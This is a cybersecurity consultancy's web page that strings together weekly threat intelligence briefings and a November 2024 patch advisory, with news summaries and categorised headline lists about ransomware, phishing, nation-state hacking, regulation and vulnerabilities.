The Bank of England and UK financial regulators have introduced new rules to enhance IT resilience in financial firms, aiming to reduce risks from cyber attacks and power outages. Effective from 1 January next year, these measures require critical third-party providers to report major incidents and conduct resilience testing. While these providers boost competitiveness, reliance on a few increases systemic risk, potentially affecting consumers and the UK's financial stability. Regulators stress that firms remain accountable for operational resilience, underscoring the need to manage disruption risks to uphold the UK's reputation for stable financial services.
Employees Are Hiding Their AI Use from Their Managers. Here's Why
New research from Slack reveals that enthusiasm for artificial intelligence among employees is waning, with excitement dropping from 47% to 41% globally. Nearly half of desk workers feel uncomfortable with their managers knowing they use AI for common tasks, fearing perceptions of laziness or incompetence. Despite 99% of executives planning to invest in AI this year, a significant skills gap persists, with 61% of employees spending less than five hours learning to use AI tools. The report highlights the need for clear policies and training to address uncertainties and fully harness AI's potential.
CISOs in 2025: Balancing Security, Compliance, and Accountability
Recent regulatory changes, including new SEC and NYDFS rules in the US, have heightened CISO accountability by requiring rapid incident disclosures and increasing personal liability. This intensifies pressures on CISOs, making the role less attractive due to potential legal repercussions and heightened stress. Looking ahead to 2025, CISOs will need advanced skills in strategic communication, risk management, and understanding emerging technologies like AI. Top priorities now include optimising existing security investments, enhancing defences against AI-driven cyber attacks, and investing in advanced cloud security capabilities.
48% of Small Businesses Don’t Offer Cyber Security Training
Recent research has revealed that 48% of UK small businesses do not provide cyber security awareness training to employees. Cyber threats are increasing in volume and complexity, particularly with the rise of AI, yet nearly half (47%) lack up-to-date anti-virus software and 15% have no firewall protection. 81% do not have a valid disaster recovery plan, and 29% have no patch management in place. With 2.39 million businesses experiencing cyber crime in the last 12 months, there is a clear need for businesses to improve their cyber security stance, both technologically and through employee awareness.
Thousands of Employees Could be Falling Victim to Obvious Phishing Scams Every Month
Cyber security provider Netskope has found that phishing attacks are a significant threat in the banking sector, with three in every 1,000 employees clicking on phishing links each month. This equates to over 1,000 banking workers in the UK potentially compromising security monthly. Russian criminal groups are identified as the most active attackers.
Sources:
https://www.helpnetsecurity.com/2024/11/15/finance-industry-vulnerabilities/
https://www.msspalert.com/news/ai-based-attacks-top-gartners-list-of-emerging-threats-again
https://www.zimperium.com/blog/mishing-the-rising-mobile-attack-vector-facing-every-organization/
https://www.zdnet.com/article/employees-are-hiding-their-ai-use-from-their-managers-heres-why/
https://www.helpnetsecurity.com/2024/11/13/daniel-schwalbe-domaintools-cisos-2025/
Governance, Risk and Compliance
48% of small businesses don’t offer cyber security training
Failed security controls cost businesses billions
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security
Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard
It’s a Hard Time to Be a CISO. Transformational Leadership Is More Imp - Infosecurity Magazine
How cyber security failures are draining business budgets - Help Net Security
The ROI of Security Investments: How Cyber Security Leaders Prove It
Maximizing cyber security ROI: Best practices for CISOs today | TechRadar
Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers
Why Future-proofing Cyber Security Regulatory Frameworks Is Essential
Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Scattered Spider, BlackCat criminals claw back • The Register
Critical Veeam RCE bug now used in Frag ransomware attacks
Tackling ransomware without banning ransom payments | TechRadar
The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard
To Pay or Not to Pay: The Ransomware Dilemma - Security Boulevard
OpenText reveals 2024 nastiest malware, LockBit leads list
WHO, 50 countries warn United Nations of increasing ransomware attacks against hospitals - The Hindu
New Ymir ransomware partners with RustyStealer in attacks
5 BCDR Oversights That Leave You Exposed to Ransomware
Cloud Ransomware Flexes Fresh Scripts Against Web Apps
New ShrinkLocker ransomware decryptor recovers BitLocker password
Idaho Man Turns to RaaS to Extort Orthodontist
Ransomware Victims
Cyber Attack Cost Oil Giant Halliburton $35 Million - SecurityWeek
Embargo ransomware claims breach of US pharmacy network • The Register
Phishing & Email Based Attacks
Thousands of employees could be falling victim to obvious phishing scams every month | TechRadar
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica
New Wave Of Phishing Attacks Exploits Microsoft Visio Files For Two-Step Credential Theft
Most prolific phishing campaign of 2024 | Professional Security Magazine
This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar
This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar
Microsoft Exchange adds warning to emails abusing spoofing flaw
If You Fall for a Phishing Email, Here’s What Happens Next
I Almost Fell For a Phishing Scam: Here’s What Happened
Other Social Engineering
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Winter Fuel Payment Scam Targets UK Citizens Via SMS | Tripwire
Scammers target UK senior citizens with Winter Fuel Payment texts
Pensioners Warned Over Winter Fuel Payment Scam Texts - Infosecurity Magazine
Malware being delivered by mail, warns Swiss cyber agency
North America sees social engineering scams multiply by a factor of 10
The terrifying Google Maps tactic now used by email scammers | Tech News | Metro News
Artificial Intelligence
AI-Based Attacks Top Gartner’s List of Emerging Threats – Again | MSSP Alert
Execs identify AI-driven cyber attacks as top security threat | SC Media
Employees are hiding their AI use from their managers. Here's why | ZDNET
HackerOne: 48% of Security Professionals Believe AI Is Risky
Hackers Are Using AI Against You: Here Is How To Protect Yourself
3 key generative AI data privacy and security concerns | TechTarget
80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis
Risk of AI in CIISec survey | Professional Security Magazine
AI Threat to Escalate in 2025, Google Cloud Warns - Infosecurity Magazine
Inside The Duality of AI's Superpowers
Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online
How CISOs Can Lead the Responsible AI Charge
Organisations face mounting pressure to accelerate AI plans, despite lack of ROI | ZDNET
Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes
How to ward-off fraudulent job seekers propped up by AI | SC Media
Sticker shock: Are enterprises growing disillusioned with AI? | ZDNET
Malware
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
ESET shines light on cyber criminal RedLine empire | Computer Weekly
Cyber Criminals Use Excel Exploit to Spread Fileless Remcos RAT Malware
Hackers now use ZIP file concatenation to evade detection
Hackers Abusing Google Ads To Deliver Fakebat Malware
Sophisticated Infostealers Top Malware Rankings
Hive0145 Targets Europe with Advanced Strela Stealer Campaigns - Infosecurity Magazine
New Glove Stealer malware bypasses Chrome's cookie encryption
This devious new malware is going after macOS users with a whole barrel of tricks | TechRadar
Hello again, FakeBat: popular loader returns after months-long hiatus | Malwarebytes
OpenText reveals 2024 nastiest malware, LockBit leads list
Watch out, that Excel document could be infected with dangerous malware | TechRadar
‘Top 10’ malware strain, Remcos RAT, now exploiting Microsoft Excel files | SC Media
Volt Typhoon rebuilds malware botnet following FBI disruption
North Korean hackers create Flutter apps to bypass macOS security
Malware being delivered by mail, warns Swiss cyber agency
This new phishing strategy utilizes GitHub comments to distribute malware | TechRadar
MacBook Pro Owners Warned As 99 New Security Problems Reported
New Ymir ransomware partners with RustyStealer in attacks
TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine
Bots/Botnets
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
Volt Typhoon rebuilds malware botnet following FBI disruption
Mobile
Mishing: The Rising Mobile Attack Vector Facing Every Organisation - Zimperium
Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices
6 telltale signs that your Android phone has malware
US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek
NatWest blocks bevy of messenger apps on staff devices • The Register
Google Confirms $1 Trillion AI Security Protection For Pixel Users
This Pixel phone feature listens in on calls to protect you from scams | ZDNET
Denial of Service/DoS/DDoS
Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post
DDoS Attacks Targeting ISPs are Different – Here’s How - Security Boulevard
'Cyber attack' council in Tewkesbury working to ease backlog - BBC News
What will carpet bomb attacks mean for security teams in 2025? - Tech Monitor
Internet of Things – IoT
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
Burglars are jamming Wi-Fi security cameras. Here's what you can do | PCWorld
Unpatched Vulnerabilities Allow Hacking of Mazda Cars: ZDI - SecurityWeek
Data Breaches/Leaks
Here's what we know about the Snowflake data theft suspects • The Register
Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine
Major cyber attacks and data breaches of 2024 - Security Boulevard
Debt Relief Firm Forth Discloses Data Breach Impacting 1.5 Million People - SecurityWeek
200,000 SelectBlinds customers have their cards skimmed in malware attack
Not to alarm you, but your Social Security number is already leaked | The Independent
300,000 Patients Impacted By Law Firm Data Breach
Business records on 100M+ people swiped, put up for sale • The Register
Leaked info of 122 million linked to B2B data aggregator breach
Embargo ransomware claims breach of US pharmacy network • The Register
Misconfigured Microsoft Power Pages could lead to data breaches
HIBP notifies 57 million people of Hot Topic data breach
Organised Crime & Criminal Actors
Scattered Spider, BlackCat criminals claw back • The Register
US Prison Sentences for Nigerian Cyber Criminals Surge in Recent Months - SecurityWeek
How Global Threat Actors May Respond to a Second Trump Term
Here's what we know about the Snowflake data theft suspects • The Register
ESET shines light on cyber criminal RedLine empire | Computer Weekly
Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto
Charges Unsealed for Alleged Hackers of Snowflake Customers
World Economic Forum calls for joint efforts to counter cyber threats - World - DAWN.COM
WEF Launches New Framework to Combat Cyber Crime - Infosecurity Magazine
Cyber crook devoid of boundaries gets 10-year prison stint • The Register
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
What To Know About Cyber Criminal Ross Ulbricht And His Possible Release Under Trump
FBI Warns US Organisations of Fake Emergency Data Requests Made by Cyber Criminals - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering
Criminal crypto launderer gets 12.5 years in prison • The Register
Crypto CEO safe after being kidnapped and held for $1 million ransom | Fortune Crypto
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
Google Warns of Rising Cloaking Scams, AI-Driven Fraud, and Crypto Schemes
Insider Risk and Insider Threats
Guardsman gets 15 years after leaking secret info on Discord • The Register
Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert
Insurance
Crum & Forster Introduces Professional Liability Insurance for Chief Information Security Officers
Supply Chain and Third Parties
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net
Millions of records from MOVEit hack released on dark web | SC Media
Amazon MOVEit Leaker Claims to Be Ethical Hacker - Infosecurity Magazine
Single points of failure breed systemic risk to national security | SC Media
300,000 Patients Impacted By Law Firm Data Breach
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
Cloud/SaaS
AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services
5 Ways to Save Your Organisation From Cloud Security Threats
Strategies for CISOs navigating hybrid and multi-cloud security - Help Net Security
Outages
Single points of failure breed systemic risk to national security | SC Media
Microsoft investigates OneDrive issue causing macOS app freezes
Identity and Access Management
Identity Security Is The Cornerstone Of Modern Cyber Defence
Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks"
Embracing The Future Of Cryptography And Identity Management
Encryption
Quantum cyber risk – securing tomorrow | BCS
Embracing The Future Of Cryptography And Identity Management
Linux and Open Source
Open Source Security Incidents Aren't Going Away
Passwords, Credential Stuffing & Brute Force Attacks
Here Are the Top 10 Passwords for 2024, and They're All Embarrassing - CNET
The true (and surprising) cost of forgotten passwords
Social Media
TikTok Pixel Privacy Nightmare: A New Case Study
Instagram purportedly subjected to widespread data scraping | SC Media
South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru
Malvertising
Hackers Abusing Google Ads To Deliver Fakebat Malware
Training, Education and Awareness
48% of small businesses don’t offer cyber security training
Cyber Security Education Needs a Team: Better Partner Up!
Regulations, Fines and Legislation
BoE and regulators set out digital rules to cut cyber-attack risks – Mortgage Strategy
CISOs in 2025: Balancing security, compliance, and accountability - Help Net Security
Preparing for DORA Amidst Technical Controls Ambiguity
GDPR landscape | Professional Security Magazine
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
How the Trump Administration May Reshape Security, Privacy
US doubles down support for UN cyber crime treaty | SC Media
Will cyber suffer under Trump’s goal to slash federal budgets? - Government Executive
Why Future-proofing Cyber Security Regulatory Frameworks Is Essential
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
Ambitious cyber security regulations leave companies in compliance chaos - Help Net Security
Washington's Cyber Security Storm of Complacency
Models, Frameworks and Standards
Preparing for DORA Amidst Technical Controls Ambiguity
NIST publishes guide on due diligence for cyber supply chain risk management – DataBreaches.Net
GDPR landscape | Professional Security Magazine
NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely
Data Protection
South Korea Fines Meta $15.7 Million For Collecting User Data - IT Security Guru
Careers, Working in Cyber and Information Security
Veterans’ military skills can help them fill cyber vacancies, State official says - Nextgov/FCW
Has the Cyber Security Workforce Peaked?
4 reasons why veterans thrive as cyber security professionals - Help Net Security
How Generative AI Will Change Jobs In Cyber Security
Tips for a successful cyber security job interview - Help Net Security
Law Enforcement Action and Take Downs
Scattered Spider, BlackCat criminals claw back • The Register
Bitcoin Fog Founder Sentenced to 12 Years for Cryptocurrency Money Laundering
Here's what we know about the Snowflake data theft suspects • The Register
iPhones Seized by Cops Are Rebooting, and No One’s Sure Why
Man gets 10 years for stealing $20M in nest eggs from 400 US home buyers - Ars Technica
Charges Unsealed for Alleged Hackers of Snowflake Customers
Apple indeed added a feature called "inactivity reboot" in iOS 18.1 that reboots locked devices
New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek
Cyber crook devoid of boundaries gets 10-year prison stint • The Register
Bitfinex Hacker Sentenced to 5 Years, Guilty of Laundering $10.5 Billion in Bitcoin
Misinformation, Disinformation and Propaganda
German interior minister warns of cyber threat ahead of elections
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
China’s Hacker Army Outshines America | Miami Herald
CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek
Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine
China-linked hackers stole surveillance data from telecom companies, US says | Reuters
Toolkit Vastly Expands APT41's Surveillance Powers
Nation State Actors
China
China’s Hacker Army Outshines America | Miami Herald
Chinese hacking effort is far more pervasive than previously reported, sources say - ABC News
US Gov Agency Urges Employees to Limit Phone Use After China ‘Salt Typhoon’ Hack - SecurityWeek
Volt Typhoon rebuilds malware botnet following FBI disruption
CISA, FBI Confirm China Hacked Telecoms Providers for Spying - SecurityWeek
Massive Telecom Hack Exposes US Officials to Chinese Espionage - Infosecurity Magazine
Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations | Trend Micro (US)
Toolkit Vastly Expands APT41's Surveillance Powers
TikTok Pixel Privacy Nightmare: A New Case Study
Russia
How a Windows zero-day was exploited in the wild for months (CVE-2024-43451) - Help Net Security
German interior minister warns of cyber threat ahead of elections
Households should keep enough cash on hand for three days, BoF says | Yle News | Yle
Pro-Russia Hackers Ramp Up Cyber Attacks on South Korea, Presidential Office Says - The Moscow Times
Iran
Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security
TA455’s Iranian Dream Job Campaign Targets Aerospace with Malware - Infosecurity Magazine
Credit cards readers across Israeli stores crash in DDoS cyber attack - The Jerusalem Post
North Korea
North Korean hackers create Flutter apps to bypass macOS security
Lazarus Group Uses Extended Attributes for Code Smuggling in macOS - Infosecurity Magazine
Pro-Russian Groups Target South Korea as North Korea Joins Ukraine - Infosecurity Magazine
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
1,400 Pegasus spyware infections detailed in WhatsApp’s lawsuit filings
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
Tools and Controls
48% of small businesses don’t offer cyber security training
Failed security controls cost businesses billions
The Role of Threat Intelligence in Preventing Ransomware - Security Boulevard
Identity Security Is The Cornerstone Of Modern Cyber Defence
Steps Organisations Can Take to Improve Cyber Resilience - Security Boulevard
How cyber security failures are draining business budgets - Help Net Security
Maximizing cyber security ROI: Best practices for CISOs today | TechRadar
API Security in Peril as 83% of Firms Suffer Incidents - Infosecurity Magazine
Machine Identities Outnumber Human Ones: 69% Of Companies Face Rising Security Risks"
Improve Your Organisation’s Data Security Posture- IT Security Guru
New iOS Security Feature Reboots Devices to Protect User Data: Reports - SecurityWeek
Cyber security network to make the UK safer and more resilient – UKRI
How Generative AI Will Change Jobs In Cyber Security
The ROI of Security Investments: How Cyber Security Leaders Prove It
Leveraging Threat Intelligence Feeds for Proactive Cyber Defence
80% Of Surveyed Businesses Don’t Have Plans For An AI-Related Crisis
Embracing The Future Of Cryptography And Identity Management
Redefining Cyber Resilience: Calculating the Human Factor | MSSP Alert
Experts Uncover 70,000 Hijacked Domains in Widespread 'Sitting Ducks' Attack Scheme
How Developers Drive Security Professionals Crazy
EU Ramps Up Cyber Resilience with Major Crisis Simulation Exercise - Infosecurity Magazine
Adversarial advantage: Using nation-state threat analysis to strengthen US cyber security
Enterprises look to AI to bridge cyber skills gap — but will still fall short | CSO Online
Dependency Management is Critical for Disaster Recovery After a Security Incident | HackerNoon
5 BCDR Oversights That Leave You Exposed to Ransomware
Half of businesses now using AI for cyber security | theHRD
Bank of England U-turns on Vulnerability Disclosure Rules - Infosecurity Magazine
O2’s AI Granny Outsmarts Scam Callers with Knitting Tales - Infosecurity Magazine
This Pixel phone feature listens in on calls to protect you from scams | ZDNET
Other News
Moody's Rating adds telecoms, airlines, utilities to highest risk category | CyberScoop
Ticketmaster Hackers Are Stealing Tickets Out of Customers' Accounts - Business Insider
Households should keep enough cash on hand for three days, BoF says | Yle News | Yle
More Spyware, Fewer Rules: What Trump’s Return Means for US Cyber Security | WIRED
These three critical sectors are riddled with high-risk vulnerabilities | ITPro
NIST report on hardware security risks reveals 98 failure scenarios - Help Net Security
Google Chrome Warning—New Drive-By Cyber Attack, No 0-Day Needed
Council Cyber Attacks: A Growing Issue | SC Media UK
How Global Threat Actors May Respond to a Second Trump Term
How Fintechs and Financial Institutions Can Demonstrate Resiliency: By Prakash Pattni
5 Must-Have Cyber Security Best Practices for Fintech Startups: By Sheza Gary
Looking to the skies: The importance of satellite cyber security | United States Studies Centre
Cyber security network to make the UK safer and more resilient – UKRI
Understanding the Cyber Criminal Mindset: Protecting Your School’s Data | Edexec
Could Cyber Expertise Aid Education in the Form of Governors? | SC Media UK
Automotive Safety and Security from the Bottom of the Stack
Cyber resilience takes centre stage at rail industry conference in London - Global Railway Review
Spray and pray: the cyber criminal tactic hurting shipping | TradeWinds
Vulnerability Management
Zero-days dominate top frequently exploited vulnerabilities - Help Net Security
Five Eyes nations reveal the top 15 most exploited flaws • The Register
NIST says exploited vulnerability backlog cleared but end-of-year goal for full list unlikely
NCSC on cyber threat landscape | Professional Security Magazine
Outdated PCs are Holes in Your Cyber Security Armor | Dell USA
Vulnerabilities
Microsoft Patch Tuesday security updates for November 2024 fix two actively exploited zero-days
HPE Patches Critical Vulnerabilities in Aruba Access Points - SecurityWeek
Veeam Patches High-Severity Vulnerability as Exploitation of Previous Flaw Expands - SecurityWeek
Patch Tuesday: Critical Flaws in Adobe Commerce, Photoshop, InDesign, Illustrator - SecurityWeek
Citrix Issues Patches for Zero-Day Recording Manager Bugs
Exploit code released for RCE attack on Citrix VDI solution • The Register
Palo Alto Advises Securing PAN-OS Interface Amid Potential RCE Threat Concerns
Critical Veeam RCE bug now used in Frag ransomware attacks
Fortinet Releases Security Updates for Multiple Products | CISA
Ivanti Patches 50 Vulnerabilities Across Several Products - SecurityWeek
High-Severity Vulnerabilities Patched in Zoom, Chrome - SecurityWeek
Citrix, Fortinet Patch High-Severity Vulnerabilities - SecurityWeek
WordPress Security Plugin Vulnerability Endangers 4 Million+ Sites
High-severity Fortinet VPN flaw allows privilege escalation • The Register
CISA Flags Two Actively Exploited Palo Alto Flaws; New RCE Attack Confirmed
D-Link won’t fix critical flaw affecting 60,000 older NAS devices
Google Chrome Warning—New Drive-By Cyber Attack, No 0-Day Needed
Chipmaker Patch Tuesday: Intel Publishes 44 and AMD Publishes 8 New Advisories - SecurityWeek
High-Severity Flaw in PostgreSQL Allows Hackers to Exploit Environment Variables
Unpatched Flaw in Legacy D-Link NAS Devices Exploited Days After Disclosure - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 13 November 2024 – Microsoft, Ivanti, Adobe, Fortinet, Citrix, AMD, Intel, Chrome and Zoom Security Updates
Black Arrow Cyber Advisory 13 November 2024 – Microsoft, Ivanti, Adobe, Fortinet, Citrix, AMD, Intel, Chrome and Zoom Security Updates
Executive summary
Alongside Microsoft's November Patch Tuesday, several vendors—including Ivanti, Adobe, Fortinet, Citrix, Intel, AMD, Google, and Zoom—have released security updates to address vulnerabilities across their product ranges. Microsoft's updates rectify 91 security issues, including four zero-day vulnerabilities, with two actively being exploited. Ivanti has issued updates for Endpoint Manager, Avalanche, Connect Secure, and Security Access Client, addressing multiple vulnerabilities rated as 'critical', 'high', and 'medium'. Adobe's patches tackle 48 security issues affecting Commerce, InDesign, Photoshop, Illustrator, and Substance 3D Painter. Fortinet has released updates for several products, including FortiOS, to remediate 'high' rated vulnerabilities. Citrix has provided security updates for various products such as Virtual Apps, Desktops, and Netscaler. Intel has issued 44 security advisories covering a variety of products. AMD has released eight advisories relating to incorrect default permissions in various software utilities. Lastly, Google has updated Chrome, and Zoom has released updates, both addressing multiple 'high' severity security issues.
What’s the risk to me or my business?
The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.
What can I do?
Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and all other vulnerabilities that have a critical or high severity ratings.
Microsoft
Further details on specific updates within this Microsoft patch Tuesday can be found here:
https://msrc.microsoft.com/update-guide/releaseNote/2024-Nov
Ivanti
Further details on specific updates across affected Ivanti products can be found here:
Adobe
Further details of the vulnerabilities in affected Adobe products can be found here under ‘Recent bulletins and advisories’:
https://helpx.adobe.com/security/security-bulletin.html
Fortinet
Further details of the vulnerabilities in affected Fortinet products can be found here:
https://www.fortiguard.com/psirt/FG-IR-23-396
https://www.fortiguard.com/psirt/FG-IR-23-475
https://www.fortiguard.com/psirt/FG-IR-24-144
https://www.fortiguard.com/psirt/FG-IR-24-199
Citrix
Further details of the vulnerabilities in affected Citrix products can be found here:
Intel
Further details of the vulnerabilities in affected Intel products can be found here:
https://www.intel.com/content/www/us/en/security-center/default.html
AMD
Further details of the vulnerabilities in affected AMD products can be found here:
https://www.amd.com/en/resources/product-security.html
Chrome
Further details of the vulnerabilities in Google Chrome can be found here:
https://chromereleases.googleblog.com/2024/11/stable-channel-update-for-desktop_12.html
Zoom
Further details of the vulnerabilities in Zoom can be found here:
https://www.zoom.com/en/trust/security-bulletin/?cms_guid=false&lang=en-US
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 08 November 2024
Black Arrow Cyber Threat Intelligence Briefing 08 November 2024:
-Fake Copyright Infringement Emails Spread Rhadamanthys Malware
-Use Public Wi-Fi? You Might Not Want to After You Read This
-New MacOS Malware Linked to North Korean Hackers
-Disaster Recovery Planning is Key in the Modern-Day Business Environment
-The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers
-Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns
-The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare
-China’s Elite Hackers Expand Target List to European Union
-How Early-Stage Companies Can Go Beyond Cyber Security Basics
-How AI Will Shape the Next Generation of Cyber Threats
-Cyber Security Trends and Tips for Small and Medium Businesses to Stay Protected
-What are the key Threats to Global National Security?
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Fake Copyright Infringement Emails Spread Rhadamanthys Malware
Check Point Research has identified a widespread phishing campaign targeting hundreds of organisations globally with fake copyright infringement emails. These emails deploy Rhadamanthys, a sophisticated cyber security threat that steals sensitive data, including cryptocurrency wallet information. The attackers impersonate brands mainly from the technology and media sectors, with nearly 70% of fake emails appearing to come from these industries. They exploit fears of copyright violation to prompt downloads of malicious files. The malware uses advanced techniques, such as embedding itself in large files to evade detection. Organisations are advised to strengthen phishing defences and monitor for unusual file downloads to mitigate this risk.
Use Public Wi-Fi? You Might Not Want to After You Read This
A recent survey found that nearly half of internet users connect to public Wi-Fi networks without verifying their legitimacy, with one in four experiencing security issues as a result. Cyber criminals exploit these unsecured networks to steal sensitive data like passwords and banking information. Experts highlight that despite warnings, convenience often outweighs caution, putting both individuals and organisations at risk of data breaches and identity theft. The report underscores the need for businesses to educate employees on the dangers of public Wi-Fi and to adopt secure practices such as using VPNs to protect sensitive information.
New MacOS Malware Linked to North Korean Hackers
Security researchers have identified new macOS malware linked to a North Korean hacking group targeting cryptocurrency businesses. The malware, named "Hidden Risk", is distributed through phishing emails masquerading as cryptocurrency news articles. Recipients are tricked into downloading a malicious program that runs on both Intel and Apple silicon Macs. The program was mistakenly notarised by Apple, allowing it to bypass security measures, but this approval has since been revoked. The malware creates a backdoor into the system, enabling hackers to execute commands and install additional payloads. The campaign is believed to have started in July and is attributed to the BlueNoroff group.
Disaster Recovery Planning is Key in the Modern-Day Business Environment
A recent survey has found that 78% of senior IT professionals reported data loss due to system failure, human error, or cyber attack in the past year, highlighting that protective measures are often breached. Yet only 54% are confident in their ability to recover data and minimise downtime after a disaster. Nearly 40% cite a lack of in-house technical expertise, 29% point to insufficient investment, and 28% note a lack of senior support as barriers to recovery planning. With incidents including a recent global outage costing businesses up to $1.5 billion, prioritising disaster recovery planning is critical for organisational resilience.
The Biggest Underestimated Security Threat of Today? Advanced Persistent Teenagers
Security experts have identified that financially motivated teenage hackers, termed "advanced persistent teenagers", are emerging as a significant cyber security threat. Organisations have suffered major data breaches and paid substantial ransoms due to these attacks, which often exploit social engineering tactics like phishing emails and impersonating helpdesk staff. Despite their youth, these hackers demonstrate capabilities once limited to nation states. Experts emphasise that insider threats and identity-related vulnerabilities are now among the biggest concerns, highlighting the need for improved identity and access management and a better understanding of the human element in cyber security.
Ransomware Attacks Hit Record Levels in 2024 Despite Law Enforcement Crackdowns
A cyber security expert noted that this year saw four eight-figure payments due to successful ransomware attacks, including a $22 million payment by a major health tech company. Data-theft-only attacks have risen by 30%, as some threat actors decide to not encrypt their victim’s systems and instead focus only on data theft. While authorities have disrupted significant ransomware operations, active groups have increased by 30% year-over-year, with 31 new groups emerging. There is a growing debate on banning ransom payments to deter these escalating cyber attacks.
The West Must Respond to Russia’s Rapidly Escalating Hybrid Warfare
Recent reports reveal that Russia is intensifying its hybrid warfare against the West. NATO Secretary General Mark Rutte highlighted a surge in cyber attacks, disinformation campaigns, and industrial sabotage across allied territories. These threats have expanded beyond Ukraine, affecting Western Europe and even the Arctic region. Despite reduced reliance on Russian energy, several EU countries remain vulnerable due to ongoing dependencies. The Kremlin is also exploiting non-traditional media and supporting populist movements to destabilise democracies. This escalating situation underscores the urgent need for Western governments and security services to collaborate in countering these multifaceted threats.
China’s Elite Hackers Expand Target List to European Union
Cyber security software provider ESET reports that China's elite government-backed hackers are expanding their targets to include the European Union. The report highlights that groups like MirrorFace, traditionally focused on Japan, are now targeting EU organisations. Despite this shift, motivations may remain Japan-centric, as spearphishing emails relate to events like EXPO 2025 in Osaka. The use of legitimate tools such as SoftEther VPN by these hackers is a growing concern, allowing them to blend into normal network traffic. ESET advises organisations to treat unexpected deployments of such tools as suspicious, emphasising the need for heightened vigilance.
How Early-Stage Companies Can Go Beyond Cyber Security Basics
Businesses are confronting increasingly sophisticated cyber threats, with phishing scams, zero-day vulnerabilities, and ransomware attacks on the rise. While compliance frameworks like GDPR and PCIDSS provide a foundation, they are insufficient alone as they may not keep pace with evolving cyber criminal tactics. Many organisations risk a false sense of security by focusing solely on compliance, often engaging in procedural tick-box exercises rather than enhancing their security posture. To mitigate risks, organisations must adopt proactive, dynamic, risk-based security strategies, including layered defences, employee training, and robust incident response plans.
How AI Will Shape the Next Generation of Cyber Threats
